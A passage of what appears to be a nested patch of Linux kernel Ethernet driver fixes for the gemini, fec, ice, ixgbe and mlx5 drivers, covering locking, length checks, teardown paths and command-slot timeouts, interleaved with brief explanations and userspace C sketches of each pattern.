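The three hunks above share one pattern: validate the netlink attribute's length against the fixed-size destination before memcpy(), and restore the saved profile on a mismatch. A minimal userspace sketch of that pattern, assuming illustrative stand-ins (port_profile, attr, PROFILE_LEN are not the driver's real types):

#include <stddef.h>
#include <string.h>
#include <errno.h>

#define PROFILE_LEN 40			/* stand-in for PORT_PROFILE_MAX */

struct port_profile {
	unsigned int set;
	char name[PROFILE_LEN];
};

struct attr {				/* stand-in for a netlink attribute */
	const void *data;
	size_t len;
};

static int set_profile(struct port_profile *pp,
		       const struct port_profile *prev,
		       const struct attr *a)
{
	if (a->len != PROFILE_LEN) {		/* length check before the copy */
		memcpy(pp, prev, sizeof(*pp));	/* roll back partial updates */
		return -EINVAL;
	}
	pp->set |= 1;
	memcpy(pp->name, a->data, PROFILE_LEN);
	return 0;
}
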
+diff --git a/drivers/net/ethernet/cortina/gemini.c b/drivers/net/ethernet/cortina/gemini.c
+index 7c0b0bc033c9c..19fb8c4caab87 100644
+--- a/drivers/net/ethernet/cortina/gemini.c
++++ b/drivers/net/ethernet/cortina/gemini.c
+@@ -1108,10 +1108,13 @@ static void gmac_tx_irq_enable(struct net_device *netdev,
+ {
+ 	struct gemini_ethernet_port *port = netdev_priv(netdev);
+ 	struct gemini_ethernet *geth = port->geth;
++	unsigned long flags;
+ 	u32 val, mask;
+ 
+ 	netdev_dbg(netdev, "%s device %d\n", __func__, netdev->dev_id);
+ 
++	spin_lock_irqsave(&geth->irq_lock, flags);
++
+ 	mask = GMAC0_IRQ0_TXQ0_INTS << (6 * netdev->dev_id + txq);
+ 
+ 	if (en)
+@@ -1120,6 +1123,8 @@ static void gmac_tx_irq_enable(struct net_device *netdev,
+ 	val = readl(geth->base + GLOBAL_INTERRUPT_ENABLE_0_REG);
+ 	val = en ? val | mask : val & ~mask;
+ 	writel(val, geth->base + GLOBAL_INTERRUPT_ENABLE_0_REG);
++
++	spin_unlock_irqrestore(&geth->irq_lock, flags);
+ }
+ 
+ static void gmac_tx_irq(struct net_device *netdev, unsigned int txq_num)
+@@ -1426,15 +1431,19 @@ static unsigned int gmac_rx(struct net_device *netdev, unsigned int budget)
+ 	union gmac_rxdesc_3 word3;
+ 	struct page *page = NULL;
+ 	unsigned int page_offs;
++	unsigned long flags;
+ 	unsigned short r, w;
+ 	union dma_rwptr rw;
+ 	dma_addr_t mapping;
+ 	int frag_nr = 0;
+ 
++	spin_lock_irqsave(&geth->irq_lock, flags);
+ 	rw.bits32 = readl(ptr_reg);
+ 	/* Reset interrupt as all packets until here are taken into account */
+ 	writel(DEFAULT_Q0_INT_BIT << netdev->dev_id,
+ 	       geth->base + GLOBAL_INTERRUPT_STATUS_1_REG);
++	spin_unlock_irqrestore(&geth->irq_lock, flags);
++
+ 	r = rw.bits.rptr;
+ 	w = rw.bits.wptr;
+ 
+@@ -1737,10 +1746,9 @@ static irqreturn_t gmac_irq(int irq, void *data)
+ 		gmac_update_hw_stats(netdev);
+ 
+ 	if (val & (GMAC0_RX_OVERRUN_INT_BIT << (netdev->dev_id * 8))) {
++		spin_lock(&geth->irq_lock);
+ 		writel(GMAC0_RXDERR_INT_BIT << (netdev->dev_id * 8),
+ 		       geth->base + GLOBAL_INTERRUPT_STATUS_4_REG);
+-
+-		spin_lock(&geth->irq_lock);
+ 		u64_stats_update_begin(&port->ir_stats_syncp);
+ 		++port->stats.rx_fifo_errors;
+ 		u64_stats_update_end(&port->ir_stats_syncp);
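
All three gemini hunks put the same read-modify-write of a shared interrupt-enable register under geth->irq_lock: the irqsave variants in process context, a plain spin_lock in the IRQ handler. A userspace analog of the serialized RMW, with a pthread mutex and a plain word standing in for the spinlock and the MMIO register:

#include <pthread.h>
#include <stdint.h>

static pthread_mutex_t irq_lock = PTHREAD_MUTEX_INITIALIZER;
static uint32_t irq_enable_reg;		/* stand-in for the device register */

static void irq_enable_bits(uint32_t mask, int en)
{
	pthread_mutex_lock(&irq_lock);	/* serialize the read-modify-write */
	if (en)
		irq_enable_reg |= mask;
	else
		irq_enable_reg &= ~mask;
	pthread_mutex_unlock(&irq_lock);
}
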
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index ebff14b0837d9..0a3df468316e5 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3732,6 +3732,14 @@ static int fec_enet_init(struct net_device *ndev)
+ 	return ret;
+ }
+ 
++static void fec_enet_deinit(struct net_device *ndev)
++{
++	struct fec_enet_private *fep = netdev_priv(ndev);
++
++	netif_napi_del(&fep->napi);
++	fec_enet_free_queue(ndev);
++}
++
+ #ifdef CONFIG_OF
+ static int fec_reset_phy(struct platform_device *pdev)
+ {
+@@ -4136,6 +4144,7 @@ fec_probe(struct platform_device *pdev)
+ 	fec_enet_mii_remove(fep);
+ failed_mii_init:
+ failed_irq:
++	fec_enet_deinit(ndev);
+ failed_init:
+ 	fec_ptp_stop(pdev);
+ failed_reset:
+@@ -4199,6 +4208,7 @@ fec_drv_remove(struct platform_device *pdev)
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 
++	fec_enet_deinit(ndev);
+ 	free_netdev(ndev);
+ 	return 0;
+ }
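
Plain-C sketch of the shared-teardown shape introduced above: the probe error path unwinds through the same deinit helper that remove() calls, so what init allocated (NAPI context, queues) is freed exactly once on every exit route. All types and helpers here are illustrative stand-ins:

#include <stdlib.h>
#include <errno.h>

struct enet { void *napi; void *queues; };

static int enet_init(struct enet *p)
{
	p->napi = malloc(64);
	p->queues = malloc(256);
	if (!p->napi || !p->queues)
		return -ENOMEM;
	return 0;
}

static void enet_deinit(struct enet *p)	/* shared by probe-error and remove */
{
	free(p->napi);
	free(p->queues);
	p->napi = p->queues = NULL;
}

static int probe(struct enet *p)
{
	int ret = enet_init(p);

	if (ret) {
		enet_deinit(p);		/* same helper remove() uses */
		return ret;
	}
	return 0;
}
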
+diff --git a/drivers/net/ethernet/freescale/fec_ptp.c b/drivers/net/ethernet/freescale/fec_ptp.c
+index cffd9ad499dda..e0393dc159fc7 100644
+--- a/drivers/net/ethernet/freescale/fec_ptp.c
++++ b/drivers/net/ethernet/freescale/fec_ptp.c
+@@ -102,14 +102,13 @@ static int fec_ptp_enable_pps(struct fec_enet_private *fep, uint enable)
+ 	struct timespec64 ts;
+ 	u64 ns;
+ 
+-	if (fep->pps_enable == enable)
+-		return 0;
+-
+-	fep->pps_channel = DEFAULT_PPS_CHANNEL;
+-	fep->reload_period = PPS_OUPUT_RELOAD_PERIOD;
+-
+ 	spin_lock_irqsave(&fep->tmreg_lock, flags);
+ 
++	if (fep->pps_enable == enable) {
++		spin_unlock_irqrestore(&fep->tmreg_lock, flags);
++		return 0;
++	}
++
+ 	if (enable) {
+ 		/* clear capture or output compare interrupt status if any.
+ 		 */
+@@ -440,6 +439,9 @@ static int fec_ptp_enable(struct ptp_clock_info *ptp,
+ 	int ret = 0;
+ 
+ 	if (rq->type == PTP_CLK_REQ_PPS) {
++		fep->pps_channel = DEFAULT_PPS_CHANNEL;
++		fep->reload_period = PPS_OUPUT_RELOAD_PERIOD;
++
+ 		ret = fec_ptp_enable_pps(fep, on);
+ 
+ 		return ret;
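
The fec_ptp hunk moves the "already in the requested state" test inside the spinlock: checked outside, two racing callers can both pass it. A userspace sketch of the check-under-lock fix (pps_enable and tmreg_lock are stand-ins):

#include <pthread.h>

static pthread_mutex_t tmreg_lock = PTHREAD_MUTEX_INITIALIZER;
static int pps_enable;

static int pps_set(int enable)
{
	pthread_mutex_lock(&tmreg_lock);
	if (pps_enable == enable) {		/* test under the same lock */
		pthread_mutex_unlock(&tmreg_lock);
		return 0;
	}
	pps_enable = enable;
	/* ... program the hardware here ... */
	pthread_mutex_unlock(&tmreg_lock);
	return 0;
}
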
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index 02eb78df2378e..a163e7717a534 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -3473,7 +3473,6 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 	struct ice_pf *pf = vsi->back;
+ 	int new_rx = 0, new_tx = 0;
+ 	bool locked = false;
+-	u32 curr_combined;
+ 	int ret = 0;
+ 
+ 	/* do not support changing channels in Safe Mode */
+@@ -3495,22 +3494,8 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	curr_combined = ice_get_combined_cnt(vsi);
+-
+-	/* these checks are for cases where user didn't specify a particular
+-	 * value on cmd line but we get non-zero value anyway via
+-	 * get_channels(); look at ethtool.c in ethtool repository (the user
+-	 * space part), particularly, do_schannels() routine
+-	 */
+-	if (ch->rx_count == vsi->num_rxq - curr_combined)
+-		ch->rx_count = 0;
+-	if (ch->tx_count == vsi->num_txq - curr_combined)
+-		ch->tx_count = 0;
+-	if (ch->combined_count == curr_combined)
+-		ch->combined_count = 0;
+-
+-	if (!(ch->combined_count || (ch->rx_count && ch->tx_count))) {
+-		netdev_err(dev, "Please specify at least 1 Rx and 1 Tx channel\n");
++	if (ch->rx_count && ch->tx_count) {
++		netdev_err(dev, "Dedicated RX or TX channels cannot be used simultaneously\n");
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+index 239266e9d5f12..80c16e04f6702 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+@@ -45,14 +45,15 @@ int ice_vsi_add_vlan(struct ice_vsi *vsi, struct ice_vlan *vlan)
+ 		return -EINVAL;
+ 
+ 	err = ice_fltr_add_vlan(vsi, vlan);
+-	if (err && err != -EEXIST) {
++	if (!err)
++		vsi->num_vlan++;
++	else if (err == -EEXIST)
++		err = 0;
++	else
+ 		dev_err(ice_pf_to_dev(vsi->back), "Failure Adding VLAN %d on VSI %i, status %d\n",
+ 			vlan->vid, vsi->vsi_num, err);
+-		return err;
+-	}
+ 
+-	vsi->num_vlan++;
+-	return 0;
++	return err;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+index 61b9774b3d31e..c24a72d1e2737 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+@@ -3673,9 +3673,7 @@ struct ixgbe_info {
+ #define IXGBE_KRM_LINK_S1(P)		((P) ? 0x8200 : 0x4200)
+ #define IXGBE_KRM_LINK_CTRL_1(P)	((P) ? 0x820C : 0x420C)
+ #define IXGBE_KRM_AN_CNTL_1(P)		((P) ? 0x822C : 0x422C)
+-#define IXGBE_KRM_AN_CNTL_4(P)		((P) ? 0x8238 : 0x4238)
+ #define IXGBE_KRM_AN_CNTL_8(P)		((P) ? 0x8248 : 0x4248)
+-#define IXGBE_KRM_PCS_KX_AN(P)		((P) ? 0x9918 : 0x5918)
+ #define IXGBE_KRM_SGMII_CTRL(P)		((P) ? 0x82A0 : 0x42A0)
+ #define IXGBE_KRM_LP_BASE_PAGE_HIGH(P)	((P) ? 0x836C : 0x436C)
+ #define IXGBE_KRM_DSP_TXFFE_STATE_4(P)	((P) ? 0x8634 : 0x4634)
+@@ -3685,7 +3683,6 @@ struct ixgbe_info {
+ #define IXGBE_KRM_PMD_FLX_MASK_ST20(P)	((P) ? 0x9054 : 0x5054)
+ #define IXGBE_KRM_TX_COEFF_CTRL_1(P)	((P) ? 0x9520 : 0x5520)
+ #define IXGBE_KRM_RX_ANA_CTL(P)		((P) ? 0x9A00 : 0x5A00)
+-#define IXGBE_KRM_FLX_TMRS_CTRL_ST31(P)	((P) ? 0x9180 : 0x5180)
+ 
+ #define IXGBE_KRM_PMD_FLX_MASK_ST20_SFI_10G_DA		~(0x3 << 20)
+ #define IXGBE_KRM_PMD_FLX_MASK_ST20_SFI_10G_SR		BIT(20)
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+index cdc912bba8089..f1b63937c552c 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+@@ -1724,59 +1724,9 @@ static s32 ixgbe_setup_sfi_x550a(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 		return -EINVAL;
+ 	}
+ 
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_PMD_FLX_MASK_ST20(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* change mode enforcement rules to hybrid */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_FLX_TMRS_CTRL_ST31(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x0400;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_FLX_TMRS_CTRL_ST31(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* manually control the config */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x20002240;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* move the AN base page values */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_PCS_KX_AN(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x1;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_PCS_KX_AN(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* set the AN37 over CB mode */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_AN_CNTL_4(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x20000000;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_AN_CNTL_4(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* restart AN manually */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= IXGBE_KRM_LINK_CTRL_1_TETH_AN_RESTART;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
++	status = mac->ops.write_iosf_sb_reg(hw,
++				IXGBE_KRM_PMD_FLX_MASK_ST20(hw->bus.lan_id),
++				IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+ 
+ 	/* Toggle port SW reset by AN reset. */
+ 	status = ixgbe_restart_an_internal_phy_x550em(hw);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index ac6a0785b10d8..465d2adbf3c00 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -964,19 +964,32 @@ static void cmd_work_handler(struct work_struct *work)
+ 	bool poll_cmd = ent->polling;
+ 	struct mlx5_cmd_layout *lay;
+ 	struct mlx5_core_dev *dev;
+-	unsigned long cb_timeout;
+-	struct semaphore *sem;
++	unsigned long timeout;
+ 	unsigned long flags;
+ 	int alloc_ret;
+ 	int cmd_mode;
+ 
++	complete(&ent->handling);
++
+ 	dev = container_of(cmd, struct mlx5_core_dev, cmd);
+-	cb_timeout = msecs_to_jiffies(mlx5_tout_ms(dev, CMD));
++	timeout = msecs_to_jiffies(mlx5_tout_ms(dev, CMD));
+ 
+-	complete(&ent->handling);
+-	sem = ent->page_queue ? &cmd->vars.pages_sem : &cmd->vars.sem;
+-	down(sem);
+ 	if (!ent->page_queue) {
++		if (down_timeout(&cmd->vars.sem, timeout)) {
++			mlx5_core_warn(dev, "%s(0x%x) timed out while waiting for a slot.\n",
++				       mlx5_command_str(ent->op), ent->op);
++			if (ent->callback) {
++				ent->callback(-EBUSY, ent->context);
++				mlx5_free_cmd_msg(dev, ent->out);
++				free_msg(dev, ent->in);
++				cmd_ent_put(ent);
++			} else {
++				ent->ret = -EBUSY;
++				complete(&ent->done);
++			}
++			complete(&ent->slotted);
++			return;
++		}
+ 		alloc_ret = cmd_alloc_index(cmd, ent);
+ 		if (alloc_ret < 0) {
+ 			mlx5_core_err_rl(dev, "failed to allocate command entry\n");
+@@ -989,10 +1002,11 @@ static void cmd_work_handler(struct work_struct *work)
+ 				ent->ret = -EAGAIN;
+ 				complete(&ent->done);
+ 			}
+-			up(sem);
++			up(&cmd->vars.sem);
+ 			return;
+ 		}
+ 	} else {
++		down(&cmd->vars.pages_sem);
+ 		ent->idx = cmd->vars.max_reg_cmds;
+ 		spin_lock_irqsave(&cmd->alloc_lock, flags);
+ 		clear_bit(ent->idx, &cmd->vars.bitmask);
+@@ -1000,6 +1014,8 @@ static void cmd_work_handler(struct work_struct *work)
+ 		spin_unlock_irqrestore(&cmd->alloc_lock, flags);
+ 	}
+ 
++	complete(&ent->slotted);
++
+ 	lay = get_inst(cmd, ent->idx);
+ 	ent->lay = lay;
+ 	memset(lay, 0, sizeof(*lay));
+@@ -1018,7 +1034,7 @@ static void cmd_work_handler(struct work_struct *work)
+ 	ent->ts1 = ktime_get_ns();
+ 	cmd_mode = cmd->mode;
+ 
+-	if (ent->callback && schedule_delayed_work(&ent->cb_timeout_work, cb_timeout))
++	if (ent->callback && schedule_delayed_work(&ent->cb_timeout_work, timeout))
+ 		cmd_ent_get(ent);
+ 	set_bit(MLX5_CMD_ENT_STATE_PENDING_COMP, &ent->state);
+ 
+@@ -1138,6 +1154,9 @@ static int wait_func(struct mlx5_core_dev *dev, struct mlx5_cmd_work_ent *ent)
+ 		ent->ret = -ECANCELED;
+ 		goto out_err;
+ 	}
++
++	wait_for_completion(&ent->slotted);
++
+ 	if (cmd->mode == CMD_MODE_POLLING || ent->polling)
+ 		wait_for_completion(&ent->done);
+ 	else if (!wait_for_completion_timeout(&ent->done, timeout))
+@@ -1152,6 +1171,9 @@ static int wait_func(struct mlx5_core_dev *dev, struct mlx5_cmd_work_ent *ent)
+ 	} else if (err == -ECANCELED) {
+ 		mlx5_core_warn(dev, "%s(0x%x) canceled on out of queue timeout.\n",
+ 			       mlx5_command_str(ent->op), ent->op);
++	} else if (err == -EBUSY) {
++		mlx5_core_warn(dev, "%s(0x%x) timeout while waiting for command semaphore.\n",
++			       mlx5_command_str(ent->op), ent->op);
+ 	}
+ 	mlx5_core_dbg(dev, "err %d, delivery status %s(%d)\n",
+ 		      err, deliv_status_to_str(ent->status), ent->status);
+@@ -1203,6 +1225,7 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 	ent->polling = force_polling;
+ 
+ 	init_completion(&ent->handling);
++	init_completion(&ent->slotted);
+ 	if (!callback)
+ 		init_completion(&ent->done);
+ 
+@@ -1220,7 +1243,7 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 		return 0; /* mlx5_cmd_comp_handler() will put(ent) */
+ 
+ 	err = wait_func(dev, ent);
+-	if (err == -ETIMEDOUT || err == -ECANCELED)
++	if (err == -ETIMEDOUT || err == -ECANCELED || err == -EBUSY)
+ 		goto out_free;
+ 
+ 	ds = ent->ts2 - ent->ts1;
+@@ -1609,6 +1632,9 @@ static int cmd_comp_notifier(struct notifier_block *nb,
+ 	dev = container_of(cmd, struct mlx5_core_dev, cmd);
+ 	eqe = data;
+ 
++	if (dev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR)
++		return NOTIFY_DONE;
++
+ 	mlx5_cmd_comp_handler(dev, be32_to_cpu(eqe->data.cmd.vector), false);
+ 
+ 	return NOTIFY_OK;
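
The core of the cmd_work_handler change is replacing an unbounded down() on the command-slot semaphore with a timed acquire that fails the command with -EBUSY, so a stuck queue surfaces as an error rather than a hung worker. A userspace analog, with sem_timedwait() standing in for down_timeout():

#include <semaphore.h>
#include <time.h>
#include <errno.h>

static int take_slot(sem_t *sem, unsigned int timeout_ms)
{
	struct timespec ts;

	clock_gettime(CLOCK_REALTIME, &ts);	/* sem_timedwait is absolute */
	ts.tv_sec  += timeout_ms / 1000;
	ts.tv_nsec += (timeout_ms % 1000) * 1000000L;
	if (ts.tv_nsec >= 1000000000L) {
		ts.tv_sec++;
		ts.tv_nsec -= 1000000000L;
	}
	if (sem_timedwait(sem, &ts))		/* ETIMEDOUT on expiry */
		return -EBUSY;
	return 0;
}
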
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+index d3de1b7a80bf5..be7302aa6f864 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+@@ -581,11 +581,16 @@ int mlx5e_mpwrq_validate_xsk(struct mlx5_core_dev *mdev, struct mlx5e_params *pa
+ 	bool unaligned = xsk ? xsk->unaligned : false;
+ 	u16 max_mtu_pkts;
+ 
+-	if (!mlx5e_check_fragmented_striding_rq_cap(mdev, page_shift, umr_mode))
++	if (!mlx5e_check_fragmented_striding_rq_cap(mdev, page_shift, umr_mode)) {
++		mlx5_core_err(mdev, "Striding RQ for XSK can't be activated with page_shift %u and umr_mode %d\n",
++			      page_shift, umr_mode);
+ 		return -EOPNOTSUPP;
++	}
+ 
+-	if (!mlx5e_rx_mpwqe_is_linear_skb(mdev, params, xsk))
++	if (!mlx5e_rx_mpwqe_is_linear_skb(mdev, params, xsk)) {
++		mlx5_core_err(mdev, "Striding RQ linear mode for XSK can't be activated with current params\n");
+ 		return -EINVAL;
++	}
+ 
+ 	/* Current RQ length is too big for the given frame size, the
+ 	 * needed number of WQEs exceeds the maximum.
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c b/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c
+index ff03c43833bbf..608d4253799de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/xsk/setup.c
+@@ -7,6 +7,18 @@
+ #include "en/health.h"
+ #include <net/xdp_sock_drv.h>
+ 
++static int mlx5e_legacy_rq_validate_xsk(struct mlx5_core_dev *mdev,
++					struct mlx5e_params *params,
++					struct mlx5e_xsk_param *xsk)
++{
++	if (!mlx5e_rx_is_linear_skb(mdev, params, xsk)) {
++		mlx5_core_err(mdev, "Legacy RQ linear mode for XSK can't be activated with current params\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
+ /* The limitation of 2048 can be altered, but shouldn't go beyond the minimal
+  * stride size of striding RQ.
+  */
+@@ -16,9 +28,14 @@ bool mlx5e_validate_xsk_param(struct mlx5e_params *params,
+ 			      struct mlx5e_xsk_param *xsk,
+ 			      struct mlx5_core_dev *mdev)
+ {
+-	/* AF_XDP doesn't support frames larger than PAGE_SIZE. */
+-	if (xsk->chunk_size > PAGE_SIZE || xsk->chunk_size < MLX5E_MIN_XSK_CHUNK_SIZE)
++	/* AF_XDP doesn't support frames larger than PAGE_SIZE,
++	 * and xsk->chunk_size is limited to 65535 bytes.
++	 */
++	if ((size_t)xsk->chunk_size > PAGE_SIZE || xsk->chunk_size < MLX5E_MIN_XSK_CHUNK_SIZE) {
++		mlx5_core_err(mdev, "XSK chunk size %u out of bounds [%u, %lu]\n", xsk->chunk_size,
++			      MLX5E_MIN_XSK_CHUNK_SIZE, PAGE_SIZE);
+ 		return false;
++	}
+ 
+ 	/* frag_sz is different for regular and XSK RQs, so ensure that linear
+ 	 * SKB mode is possible.
+@@ -27,7 +44,7 @@ bool mlx5e_validate_xsk_param(struct mlx5e_params *params,
+ 	case MLX5_WQ_TYPE_LINKED_LIST_STRIDING_RQ:
+ 		return !mlx5e_mpwrq_validate_xsk(mdev, params, xsk);
+ 	default: /* MLX5_WQ_TYPE_CYCLIC */
+-		return mlx5e_rx_is_linear_skb(mdev, params, xsk);
++		return !mlx5e_legacy_rq_validate_xsk(mdev, params, xsk);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h
+index 07187028f0d35..1445a9a46baea 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/en_accel.h
+@@ -102,8 +102,14 @@ static inline void
+ mlx5e_udp_gso_handle_tx_skb(struct sk_buff *skb)
+ {
+ 	int payload_len = skb_shinfo(skb)->gso_size + sizeof(struct udphdr);
++	struct udphdr *udphdr;
+ 
+-	udp_hdr(skb)->len = htons(payload_len);
++	if (skb->encapsulation)
++		udphdr = (struct udphdr *)skb_inner_transport_header(skb);
++	else
++		udphdr = udp_hdr(skb);
++
++	udphdr->len = htons(payload_len);
+ }
+ 
+ struct mlx5e_accel_tx_state {
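
The hunk above makes mlx5e_udp_gso_handle_tx_skb() patch the inner UDP header when the skb is encapsulated, since that header carries the per-segment datagram length. A plain-C sketch of the selection (struct udp_hdr is an illustrative stand-in, not the kernel's struct udphdr):

#include <stdint.h>
#include <arpa/inet.h>

struct udp_hdr { uint16_t source, dest, len, check; };

static void set_gso_udp_len(struct udp_hdr *outer, struct udp_hdr *inner,
			    int encapsulation, uint16_t payload_len)
{
	/* encapsulated: the inner header describes each segment */
	struct udp_hdr *u = encapsulation ? inner : outer;

	u->len = htons(payload_len);
}
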
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h
+index 1878a70b9031d..43ccdf0e6cff8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.h
+@@ -97,18 +97,11 @@ mlx5e_ipsec_feature_check(struct sk_buff *skb, netdev_features_t features)
+ 		if (!x || !x->xso.offload_handle)
+ 			goto out_disable;
+ 
+-		if (xo->inner_ipproto) {
+-			/* Cannot support tunnel packet over IPsec tunnel mode
+-			 * because we cannot offload three IP header csum
+-			 */
+-			if (x->props.mode == XFRM_MODE_TUNNEL)
+-				goto out_disable;
+-
+-			/* Only support UDP or TCP L4 checksum */
+-			if (xo->inner_ipproto != IPPROTO_UDP &&
+-			    xo->inner_ipproto != IPPROTO_TCP)
+-				goto out_disable;
+-		}
++		/* Only support UDP or TCP L4 checksum */
++		if (xo->inner_ipproto &&
++		    xo->inner_ipproto != IPPROTO_UDP &&
++		    xo->inner_ipproto != IPPROTO_TCP)
++			goto out_disable;
+ 
+ 		return features;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index e7d396434da36..e2f134e1d9fcf 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -3666,7 +3666,7 @@ mlx5e_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats)
+ 		mlx5e_fold_sw_stats64(priv, stats);
+ 	}
+ 
+-	stats->rx_dropped = priv->stats.qcnt.rx_out_of_buffer;
++	stats->rx_missed_errors = priv->stats.qcnt.rx_out_of_buffer;
+ 
+ 	stats->rx_length_errors =
+ 		PPORT_802_3_GET(pstats, a_in_range_length_errors) +
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+index a6d7e2cfcd0e1..e6e792a38a640 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+@@ -153,7 +153,11 @@ mlx5e_tx_get_gso_ihs(struct mlx5e_txqsq *sq, struct sk_buff *skb, int *hopbyhop)
+ 
+ 	*hopbyhop = 0;
+ 	if (skb->encapsulation) {
+-		ihs = skb_inner_tcp_all_headers(skb);
++		if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4)
++			ihs = skb_inner_transport_offset(skb) +
++			      sizeof(struct udphdr);
++		else
++			ihs = skb_inner_tcp_all_headers(skb);
+ 		stats->tso_inner_packets++;
+ 		stats->tso_inner_bytes += skb->len - ihs;
+ 	} else {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index 01c0e1ee918d8..a283d8ae466b6 100644
